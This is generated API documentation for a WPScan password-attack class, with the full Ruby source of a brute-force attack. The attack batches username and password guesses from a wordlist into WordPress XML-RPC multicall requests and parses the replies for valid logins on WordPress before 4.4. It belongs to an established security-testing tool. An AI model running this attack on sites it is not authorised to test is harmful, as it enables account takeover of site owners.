Class: WPScan::Finders::Passwords::XMLRPCMulticall

Inherits:

CMSScanner::Finders::Finder

• Object
• CMSScanner::Finders::Finder
• WPScan::Finders::Passwords::XMLRPCMulticall

Defined in:

app/finders/passwords/xml_rpc_multicall.rb

Overview

Password attack against the XMLRPC interface with the multicall method WP < 4.4 is vulnerable to such attack

Instance Method Summary

• #attack(users, wordlist_path, opts = {}) {|Model::User| ... } ⇒ Object

  TODO: Make rubocop happy about metrics etc.

• #check_and_output_errors(res) ⇒ Object
• #do_multi_call(users, passwords) ⇒ Typhoeus::Response
• #passwords_from_wordlist(file, passwords_size) ⇒ Array<String>

  The passwords from the last checked position in the file until there are passwords_size passwords retrieved.

• #passwords_size(max_passwords, users_size) ⇒ Object

  rubocop:enable all.

Instance Method Details

#attack(users, wordlist_path, opts = {}) {|Model::User| ... } ⇒ Object

TODO: Make rubocop happy about metrics etc

rubocop:disable all

Parameters:

• users (Array<Model::User>)
• wordlist_path (String)
• opts (Hash) (defaults to: {})

Options Hash (opts):

• :show_progression (Boolean)
• :multicall_max_passwords (Integer)

Yields:

• (Model::User) —

  When a valid combination is found

# File 'app/finders/passwords/xml_rpc_multicall.rb', line 58

def attack(users, wordlist_path, opts = {})
  checked_passwords      = 0
  wordlist               = File.open(wordlist_path)
  wordlist_size          = wordlist.count
  max_passwords          = opts[:multicall_max_passwords]
  current_passwords_size = passwords_size(max_passwords, users.size)

  create_progress_bar(total: (wordlist_size / current_passwords_size.round(1)).ceil,
                      show_progression: opts[:show_progression])

  wordlist.sysseek(0) # reset the descriptor to the beginning of the file as it changed with #count

  loop do
    current_users      = users.select { |user| user.password.nil? }
    current_passwords  = passwords_from_wordlist(wordlist, current_passwords_size)
    checked_passwords += current_passwords_size

    break if current_users.empty? || current_passwords.nil? || current_passwords.empty?

    res = do_multi_call(current_users, current_passwords)

    progress_bar.increment

    check_and_output_errors(res)

    # Avoid to parse the response and iterate over all the structs in the document
    # if there isn't any tag matching a valid combination
    next unless res.body =~ /isAdmin/ # maybe a better one ?

    Nokogiri::XML(res.body).xpath('//struct').each_with_index do |struct, index|
      next if struct.text =~ /faultCode/

      user = current_users[index / current_passwords.size]
      user.password = current_passwords[index % current_passwords.size]

      yield user

      # Updates the current_passwords_size and progress_bar#total
      # given that less requests will be done due to a valid combination found.
      current_passwords_size = passwords_size(max_passwords, current_users.size - 1)

      if current_passwords_size == 0
        progress_bar.log('All Found') # remove ?
        progress_bar.stop
        break
      end

      begin
        progress_bar.total = progress_bar.progress + ((wordlist_size - checked_passwords) / current_passwords_size.round(1)).ceil
      rescue ProgressBar::InvalidProgressError
      end
    end
  end
  # Maybe a progress_bar.stop ?
end

#check_and_output_errors(res) ⇒ Object

Parameters:

• res (Typhoeus::Response)

# File 'app/finders/passwords/xml_rpc_multicall.rb', line 123

def check_and_output_errors(res)
  progress_bar.log("Incorrect response: #{res.code} / #{res.return_message}") unless res.code == 200

  if /parse error. not well formed/i.match?(res.body)
    progress_bar.log('Parsing error, might be caused by a too high --max-passwords value (such as >= 2k)')
  end

  return unless /requested method [^ ]+ does not exist/i.match?(res.body)

  progress_bar.log('The requested method is not supported')
end

#do_multi_call(users, passwords) ⇒ Typhoeus::Response

Parameters:

• users (Array<User>)
• passwords (Array<String>)

Returns:

• (Typhoeus::Response)

# File 'app/finders/passwords/xml_rpc_multicall.rb', line 13

def do_multi_call(users, passwords)
  methods = []

  users.each do |user|
    passwords.each do |password|
      methods << ['wp.getUsersBlogs', user.username, password]
    end
  end

  target.multi_call(methods, cache_ttl: 0).run
end

#passwords_from_wordlist(file, passwords_size) ⇒ Array<String>

Returns The passwords from the last checked position in the file until there are passwords_size passwords retrieved.

Parameters:

• file (IO)
• passwords_size (Integer)

Returns:

• (Array<String>) —

  The passwords from the last checked position in the file until there are passwords_size passwords retrieved

# File 'app/finders/passwords/xml_rpc_multicall.rb', line 29

def passwords_from_wordlist(file, passwords_size)
  pwds       = []
  added_pwds = 0

  return pwds if passwords_size.zero?

  # Make sure that the main code does not call #sysseek or #count etc
  # otherwise the file descriptor will be set to somwehere else
  file.each_line(chomp: true) do |line|
    pwds << line
    added_pwds += 1

    break if added_pwds == passwords_size
  end

  pwds
end

#passwords_size(max_passwords, users_size) ⇒ Object

rubocop:enable all

# File 'app/finders/passwords/xml_rpc_multicall.rb', line 115

def passwords_size(max_passwords, users_size)
  return 1 if max_passwords < users_size
  return 0 if users_size.zero?

  max_passwords / users_size
end